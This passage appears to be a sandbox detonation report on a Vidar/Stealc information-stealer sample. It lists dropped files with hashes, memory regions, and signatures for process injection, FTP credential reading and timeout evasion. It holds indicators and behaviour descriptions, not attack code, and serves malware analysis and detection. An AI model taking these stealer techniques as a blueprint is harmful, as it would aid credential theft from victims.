SHA512 b1b699f38efe9e5794325aeed1758e0492eff6c5e8539412d66e185ab1d2b1cdb2301210278e7658b25dd04d70b13c010d1f92d8476e34d23b9efa5983851005

C:\Users\Admin\AppData\Local\Temp\Johnston

MD5 103d119aa8a89d75d8d087599c321fe9
SHA1 f38f558952f028f3b64b758d2a6570d09d25eb5f
SHA256 d85b39bc6ef094b7a7d4247b5eacb44f1f32ea887614324f5fa882ff61f0bbcf
SHA512 32dddd0981a9ce9404ecd1224fd57e5f65e4110946d21c911ef5e726d285a398ba4e1b86b1f95511edf55689ff80a21804724593e44a1646e248b694d6c54be6

C:\Users\Admin\AppData\Local\Temp\Piss

MD5 93131f960f434fa2c6ed8310b80c952c
SHA1 c5fb6e077d03598457031585793381ae1abab8df
SHA256 c1376889ec8b5cd3e710146be003a3ff51940d6a7e1cb943b8c5c04a7da98e40
SHA512 ed67a586f73b5f1773f5b312436275a30fc26c936f368926ee295c0508f7bc02d34b5c049f6a51d2f6937fd7b4341680038bd0a2f1d03a7a07a404ef58244cbb

C:\Users\Admin\AppData\Local\Temp\Brass

MD5 cfbeb50abeb4b45cae9a85881deafdeb
SHA1 a2679acd6055a0bf07fc34a38cf92df1d8b47bcb
SHA256 93406ff30fe7c1a9f8300d4ed6097b15515fa2b421f09b32e9c3b44f71d85b10
SHA512 f46734ab6e917a213a5083f69a5f41b823bc0687b6f77e84cb1016183c74c1af0331c431b9655fc368cb4bfaec16a7284cdcc4f3be2880306f7aadfcef5739f8

C:\Users\Admin\AppData\Local\Temp\Thong

MD5 e85daf9e828a54404f20e99b13b50fb1
SHA1 c4596f5531659d2d985ab07f8a83b5bf7046c7ad
SHA256 02ae86086ce07d7fa62afb52a7cb300b7aab300293740a218427245fe249a16c
SHA512 8eca39efccbe97fad55665c48f39ddb0b1fb3f8d25daaf076b36fb5f01f925752150ac2e15939f82b9987f88859148aa425850a581018fbb2283bbf6f752f0d2

C:\Users\Admin\AppData\Local\Temp\Verify

MD5 d2c6e84f2b8208dcef9027b697736a87
SHA1 23807b3fdfa56512273b22677ed1742ca1d97f67
SHA256 28b9354f9812c980d345d9fca164458e5745c2f41b03fc17f26f5c9070ae4ab2
SHA512 f12efe8547372048f5a4e6ab1b17eb2c0c7edb5e6d2c7a494e80a90b800f0e365555f7e9ef84950ae3807abf8179f13d718885f349198c1f7ac26bb9cc62de29

C:\Users\Admin\AppData\Local\Temp\Accredited

MD5 5fe6dff8f4824b74d5b55b91234d2ad2
SHA1 4ff5c6aa348c63720a951cf2ae797786b7f7d53b
SHA256 d8b24570072e032030d6f4dcf403e056a33334eb1c77e7497a46dffbac44338e
SHA512 0f18eacd293524086086ecd8a06c387ffdcfa14bf613637bf33ceaf6071b7dfecf03d803a038271c7271bdecf42979358fb0d99b5141d83cc5d2e1c603a11173

C:\Users\Admin\AppData\Local\Temp\Rivers

MD5 fbc978cdd7879bb3177a5951b9ebc202
SHA1 a79984bfe14dbbcf273caac437e4ff853085cb94
SHA256 a48c0359f7a95e765b0759998d444bcf05848df6d70d49f216d73ad24520e9ed
SHA512 8f7e1cb2f65b94f1d35796b7845208566b0e7c685f53cdb3c67373871b906cdc4cc58043ac51073ceea335c7c0db155a91a0fff380adde8066cd39e3248e747c

C:\Users\Admin\AppData\Local\Temp\Monetary

MD5 fb207dd3daae6d70329b147cd27629f8
SHA1 31b24557f3a38fc2a6fac2356b9c84560f5a7eb4
SHA256 55e4055a761f6de72b67f65a7a9ef4aa904be7dbbd414dadfa1c2924f1f1c73d
SHA512 d615075db7f6b5019f04a78c7b8fcc090176821e5280be486cb5bc464fd7640db7c5ed3dfb9bbd807ac31b165945b7d49b4cc6fc0fce712f5f290c4b70f056e5

C:\Users\Admin\AppData\Local\Temp\Trials

MD5 b61d86bf3beffab4d100c221f8b5d505
SHA1 7aaf57112aaddb0e6bda53e9881f88806917b44d
SHA256 544daa4eebc82abd4e6de0db4d74eaac30674206bb24249dad032a5440a9ed0c
SHA512 d0a40173e2df3569aaf25b5747b583651ef2c0eb54e0be79e71244cf9e7fecfa705f835d7dea2c97f2cb9f9523f9f8712f7b60ad1cd0a0dd43ae4dcac010e6fd

C:\Users\Admin\AppData\Local\Temp\Min

MD5 84b5cbc02b6784b589a1e732fab2eb11
SHA1 047cf1a36b734bdd2dd6c6be37e31c57eb801bed
SHA256 99a173e0ef78baefcf23c7e91d3420bd337d3cbd6f5438247108f99bdbca2314
SHA512 cae10222a0aad3771afd4d048d975fc7e187fc470bdb0cb1eba96eb8a7e4a6b03a00ad5ff1a8fcd0ff07ac3232fbdd8f0f28076b3d61950218ebfac8991e019b

C:\Users\Admin\AppData\Local\Temp\Costs

MD5 e2da627e46f2a55408826eb2594fb43b
SHA1 c19e0b76395ef2925773aebc0a50a321767969f9
SHA256 ebb816fcde52ecfa80be03363350a879aa8d01a894ab4a920fe77185e74e561c
SHA512 5329a74fe6b7f76742fda2cb83d26fc7201da7cf8e473a4124c5976351d3df520ab001f8caeef809f6f16314ad722bd0329470745b5f7bee436235f682639556

C:\Users\Admin\AppData\Local\Temp\Beach

MD5 5941c44b1fc2813ab474e88e9106c241
SHA1 a328363081d9ffd7e14413ed7cd7af75b3d42368
SHA256 661b5c7db73b2a3e8b9a20e7b54d26b73b8a3463b9387d8675d399fd1a8d8bad
SHA512 19b0d470bcb7b19ad589231f6d03db62eef4e66b3eb8d0d87a4c1dce20bad8f404ecb703250f55e8bfdc1429d59008524a5f687c47e36504b68fd70a281cb427

C:\Users\Admin\AppData\Local\Temp\Spirit

MD5 45b7c6db4c4212296c0f409e050f497f
SHA1 085ac7a8e2a695186cfe5c43a3e6db58588f91ce
SHA256 f55b826fa11826340d240a7df59c94c3ae34bc2b209a54ec6c19757ae8b0f1a2
SHA512 65ddef8c13450a27cb55ab4fde8da3b5526547f704950bd85c3854d223ab22624e5d11c08750baa5e603a9ef7254fdd6a9209548dbba824577c8b4ab6d304c0d

C:\Users\Admin\AppData\Local\Temp\Level

MD5 a4dadb8a544a089b4aee4a5748aaf235
SHA1 0104d996bec6261067d544dc3350e00708be80bf
SHA256 9ea4dba08ff6119c3f8615527df474e335d54c07c010498eb9b4490e5a9e5c2c
SHA512 63ba6ea32f27bfcbb698e10d8709a841046a72a2bf78f26ea8d3a4b862dfd3aee1d416cec22b5c79b34a2c2bb5e5f2da1020889f1c9b6143f0a4f9bf6e9af71e

C:\Users\Admin\AppData\Local\Temp\Penguin

MD5 888388580b16210569adcef464f2327e
SHA1 3c98fa3319589c23e26e11b078072ebaa5de1b76
SHA256 b6903261df9e0ea6aa198c7e7b41472057fe22d751588c115ec938d3e42dfc13
SHA512 288ccbac5cc5db5127a9d280ca4771e136396a98a1ac0ce601ac2e688a15e00507f00db84689a99ee1a649ec0774eeb4b522374c41b8983a8a7bdf2c3089e2f1

C:\Users\Admin\AppData\Local\Temp\Connections

MD5 1bf949f7fd95cff659a03139086f7d87
SHA1 b712712a2944c32875c48d010a3301188ba90d14
SHA256 7d8ad83805f6d996e0dd9fd6f41c4f4195049dc1dbc836a0c524e68685e8cb49
SHA512 a66c1abad745ae88b1a94d94c2a4a1e7a37985d19fe9d36efdc9ec1aaa2883a5409c91c0b37c901864d72ae616da86cfdabedfb0ccfa695804fc0715d1ac5130

C:\Users\Admin\AppData\Local\Temp\Volleyball

MD5 24e47a1999e17f9f0f259fcdacd4df25
SHA1 ed7c655c0c386eb7dd63613a1004b9425e2d7977
SHA256 ba73de3122a0bf1c500b19be79793b7fe18a28db957524e6e85f48953f453007
SHA512 63066255479c7cd33bdae5571eb27c608580290a14fa5804f78748dd4d0f787794009cd085f3f30b4f9e068e233a1939390f1ed0550e4bd8d28d9a2b4e09f8ea

C:\Users\Admin\AppData\Local\Temp\Broker

MD5 4a73cbddfd3263424187b29dd0356182
SHA1 c14e63ee586e70134fa24432b6d3966ff483b78a
SHA256 6090a3dc60ec7a84c1c946c62c024b422c6bd116fd15d763e9fe59072b838627
SHA512 ff03ffe59016a8f1b08c0fca64a29a748034d4f5933e36b1e5d359a9b60e5499f2575ce9e1bccf80dd368c20c4f38fbd3f3425c1ef799dd993076c67fa0e32e8

C:\Users\Admin\AppData\Local\Temp\Ali

MD5 716407bf663adacaef5d04814488026c
SHA1 12499ea9481fb26bc58ab34f1295d83d5855b424
SHA256 04f0ca51092b541a82289d054ada19e52c40da4434b827f03b6b7b70766abc30
SHA512 84bcd384bbd5dd4535015e82a1ed799135d86633ccfebad36f0f399e2e1b02c140259e223d18c81e6b4bb8d1f774b7b03d7e30acb2ec6727b39de79363d8e98a

C:\Users\Admin\AppData\Local\Temp\Miss

MD5 0829f71740aab1ab98b33eae21dee122
SHA1 0631457264ff7f8d5fb1edc2c0211992a67c73e6
SHA256 9f1dcbc35c350d6027f98be0f5c8b43b42ca52b7604459c0c42be3aa88913d47
SHA512 18790c279e0ca614c2b57a215fecc23a6c3d2d308ce77f314378cb2d1b0f413acd3a9cd353aa6da86ec9f51916925c7210f7dfabc0ef726779f8d44f227f03b1

C:\Users\Admin\AppData\Local\Temp\Initiative

MD5 68d718bc0a5b98e7003a1ee5dafe1210
SHA1 6b0c348a4ae6e734de65a05649ec18e9ba183e7d
SHA256 15f7faefcd8d2c2aceaf1da0f3b8b5ac7db4d868eced2b999ccc42bb579f83c4
SHA512 086873e11b7083afc236aba4d817b638f40df25b5bc4af50963d0fc01808735c60b54d6cbb56e11624cc61309ae95b0ccf906a487051f98150fef0fbf75c7252

C:\Users\Admin\AppData\Local\Temp\Mauritius

MD5 ba27e2d8c8494f275c741457bc15f533
SHA1 42468740d544b6785068d47f4587b36109b6f519
SHA256 1beb1b2c2af505ac359cf66ee6895b645480238bd5f40cee072fc85b0019f24d
SHA512 96f48e59f26b89564269265a3acd29ba5645ffdbe153e3c4fbaad84785bd97ede9a49931d0c3ae909fc27e18e680bf7f879ad5332183e706ce58f1da79300aa6

C:\Users\Admin\AppData\Local\Temp\Al

MD5 2332eef605c2bf44201d0f839155b887
SHA1 bb92bc1b42b4d1799c0c7f551a04137ffa280c69
SHA256 521a256a47610774a9eb2fa85441789d7e595ca9f662e074042ec9df12fa66f3
SHA512 388fe1ea427cf3c4b3b85e22ae8e6bf034f457682fba6b0ab82a113a2589754d1b1d8d6fbddd70f79f007036b3bc7750c89d190fc96ff70dd3ce4f97724e47aa

C:\Users\Admin\AppData\Local\Temp\Salvador

MD5 c9bdd9c82c3ed58946eba402b537c847
SHA1 9564a227f3950a0898437476c224886579369678
SHA256 600d9d7edda40ee5bf3c6bee9987b2c288f547c33637ef72a23a831708f4dfdb
SHA512 ff40cc3cc18364bbf7bdde8f525b7bc23e669513c743d8acf58b45671c119aca279a554727c1e200cc146ea90ffe19330a65bb992065c820520bafd475a0a6fa

C:\Users\Admin\AppData\Local\Temp\Camel

MD5 7d82d3900c8ba40cf122071c37f0cf9c
SHA1 0008970f1a960a8fdfe55b678a5f9b45048f8e0e
SHA256 af9abccf8d3abc3abb9820f19e7aa6bd603d1f47ce5a7aba58a2b5e5e55ed7cf
SHA512 efd0d18903d1cfb9d1bd3b6103924a743bd8da38c2e00a9367f079ea5140f5df6b82d424aa2129e0e095bc48eaf038f89d90db23fb914723ca9b4cfce48a5a87

C:\Users\Admin\AppData\Local\Temp\Urge

MD5 b4164811733d945f464aded1dcd862fa
SHA1 238bfcc1dca54e80ababa6676d21bf12894ecba5
SHA256 755f1572c8f0e5e9ef789774dace4faae388fbd4380c5f99d5f073009fdbed01
SHA512 d4ab05cdedc215e6185b7b959e1951011346345071c69f3237c2fd0a0eefd4e8c0a792538b5d1e2a5ab8e8c2598ace162ed66be0bb94f10de7aa49790facc727

C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

MD5 b06e67f9767e5023892d9698703ad098
SHA1 acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA256 8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA512 7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

memory/3736-365-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-366-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-368-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-375-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-377-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/3736-376-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-390-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-391-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-399-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-400-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-416-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-417-0x0000000001600000-0x0000000001D4A000-memory.dmp

C:\ProgramData\FHJKKECFIECA\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/3736-439-0x0000000001600000-0x0000000001D4A000-memory.dmp

C:\ProgramData\FHJKKECFIECA\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

memory/3736-440-0x0000000001600000-0x0000000001D4A000-memory.dmp

C:\ProgramData\ECFCBFBGDB.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

memory/2704-463-0x00000000003A0000-0x00000000008B3000-memory.dmp

C:\ProgramData\AECAKECAEG.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/2636-478-0x00000000003A0000-0x00000000005E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\b704ce8e

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/2704-484-0x0000000071CD0000-0x0000000071E4D000-memory.dmp

memory/2704-485-0x00007FFA2E280000-0x00007FFA2E489000-memory.dmp

memory/2636-487-0x0000000071CD0000-0x0000000071E4D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\b7f2c405

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/2636-488-0x00007FFA2E280000-0x00007FFA2E489000-memory.dmp

memory/3736-492-0x0000000001600000-0x0000000001D4A000-memory.dmp

C:\ProgramData\FHJKKECFIECA\DHCGHD

MD5 59071590099d21dd439896592338bf95
SHA1 6a521e1d2a632c26e53b83d2cc4b0edecfc1e68c
SHA256 07854d2fef297a06ba81685e660c332de36d5d18d546927d30daad6d7fda1541
SHA512 eedb6cadbceb2c991fc6f68dccb80463b3f660c5358acd7d705398ae2e3df2b4327f0f6c6746486848bd2992b379776483a98063ae96edb45877bb0314874668

memory/3736-493-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-509-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-510-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-514-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-515-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-528-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3736-529-0x0000000001600000-0x0000000001D4A000-memory.dmp

C:\ProgramData\FHJKKECFIECA\JJKFBA

MD5 c8260d37073d07384063820fcd97cb1c
SHA1 25324c500695d19e4a0a0824228576a59f9abe58
SHA256 29391ff5068cfd037ed486db2fd2bc780731ca952df39377240aa4456f176560
SHA512 ffbba119b938f8227907792b8a7853daf8c8279c9f3e0f4408ddb324b21a75d093e8790efe4a7e6876b171a2cffb71022cd7a8d2f4fd1ac5b813c5aec4d6bd4b

C:\ProgramData\FHJKKECFIECA\KKECBF

MD5 41ac544896c59f0f47c5422e8d8cbe3c
SHA1 4fac0744d1c5eb1fb9da3b9fac67f690639c1ebc
SHA256 a46a88cd9a2318aa069993b23acf27db06f528ca5bdbebee717e25b38a5dc45a
SHA512 83ab24023f5b16bc5d549a8d934cfe9f1a79bc87f3c579992e6cf885cb9f14e2facef8b83d1af7b141fb23285d1509779da17236a587436127a9ccacedcb9e35

memory/2704-542-0x0000000071CD0000-0x0000000071E4D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\b96e9a3d

MD5 437a3996b60bb80ffec176b1966fd746
SHA1 dfaae76ebcdd2d3faed7391288b1ccaa2001563c
SHA256 dc863db086d3640ea6448dc74626aafc84c618c03ed6fc544d0905611251f852
SHA512 61332f848161fab3c9ca7af894a1496a0985463d430dd2170abc7487a879309244a0e5e45b523d3db430cf8608d9d5bb3ef15d1882ff36b6d56074ec96f860b8

memory/2636-545-0x0000000071CD0000-0x0000000071E4D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bb15a6b1

MD5 40255241faae99f360de52c6799800b1
SHA1 c4a12aec58fbd0f7c3ce4cb983a7a5604db8522a
SHA256 613476dd9a42793f380ae6b8ec614494ec12a5f3c9080cd9806ed0c7bf27e3cd
SHA512 70c672362ee581ff024246998fcfbdf40f6028dc64ffde51eae8c3a0f7a7b4149e063b4d22a03cc258cc3ee26f3612eaf7e8b4069bb866728e3d05be6cc34957

memory/1364-548-0x00007FFA2E280000-0x00007FFA2E489000-memory.dmp

memory/2024-549-0x00007FFA2E280000-0x00007FFA2E489000-memory.dmp

C:\ProgramData\FHJKKECFIECA\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

C:\ProgramData\FHJKKECFIECA\VCRUNT~1.DLL

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\FHJKKECFIECA\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

memory/2024-556-0x0000000071CD0000-0x0000000071E4D000-memory.dmp

memory/1364-565-0x0000000071CD0000-0x0000000071E4D000-memory.dmp

memory/4648-569-0x00007FFA0C6E0000-0x00007FFA0DD80000-memory.dmp

memory/2864-572-0x00007FFA2E280000-0x00007FFA2E489000-memory.dmp

memory/4648-573-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2320-577-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2320-581-0x000002856C1A0000-0x000002856C1C0000-memory.dmp

memory/2320-580-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2320-579-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2320-582-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2320-584-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2320-583-0x0000000140000000-0x00000001407DC000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 826e51af37f62d47ec51de9f61469280
SHA1 18d9055785fd15951a9010b6f23b6e711388c0a0
SHA256 5b734b5d9e3a2d89f5de8e2871b38c0b55d8513779f1d2baa8fed10a8f092dfc
SHA512 21c5b0e29252dacca0e480cb1cf57d879c62df7208329f602a701cae264f54e5b0242d2bb37d6f0272ca2f710a29801539193221a218985585a942b14e248ac9

C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1

MD5 1e49c49df1e9bb5a3646fbdd72fff72d
SHA1 ca3b2f92797030ad96341c5551812e679e9746d3
SHA256 df52ed4a147cad99aec03614368f8781e806c45be6e046ec4a73a26e7ec9cd10
SHA512 b0c96599de30f1822ddc99d1fed6341ae06f25a171c52b9a78f6304d02a30f8da41738d4af4b4c8365b0b52739b3df03be99dddf764f12f724bd24a91b59c82d

memory/1908-601-0x0000000003000000-0x0000000003036000-memory.dmp

memory/1908-602-0x0000000005B00000-0x000000000612A000-memory.dmp

memory/1908-603-0x0000000005950000-0x0000000005972000-memory.dmp

memory/1908-604-0x0000000006230000-0x0000000006296000-memory.dmp

memory/1908-605-0x00000000062A0000-0x0000000006306000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z1jsriib.1rn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1908-614-0x0000000006370000-0x00000000066C7000-memory.dmp

memory/1908-615-0x00000000067D0000-0x00000000067EE000-memory.dmp

memory/1908-616-0x0000000006810000-0x000000000685C000-memory.dmp

memory/1908-618-0x0000000007860000-0x00000000078F6000-memory.dmp

memory/1908-619-0x0000000006D40000-0x0000000006D5A000-memory.dmp

memory/1908-620-0x0000000006DB0000-0x0000000006DD2000-memory.dmp

memory/1908-621-0x0000000007EB0000-0x0000000008456000-memory.dmp

memory/1908-622-0x0000000008AE0000-0x000000000915A000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 12:53

Reported

2024-06-14 12:57

Platform

win7-20240508-en

Max time kernel

118s

Max time network

126s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2260 created 1184 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Windows\Explorer.EXE

Vidar

stealer vidar

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Reads data files stored by FTP clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2260 set thread context of 2556 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2928 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\Setup (6).exe C:\Windows\SysWOW64\cmd.exe
PID 2928 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\Setup (6).exe C:\Windows\SysWOW64\cmd.exe
PID 2928 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\Setup (6).exe C:\Windows\SysWOW64\cmd.exe
PID 2928 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\Setup (6).exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1696 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1696 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1696 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1696 wrote to memory of 1844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1696 wrote to memory of 1844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1696 wrote to memory of 1844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1696 wrote to memory of 1844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1696 wrote to memory of 908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1696 wrote to memory of 908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1696 wrote to memory of 908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
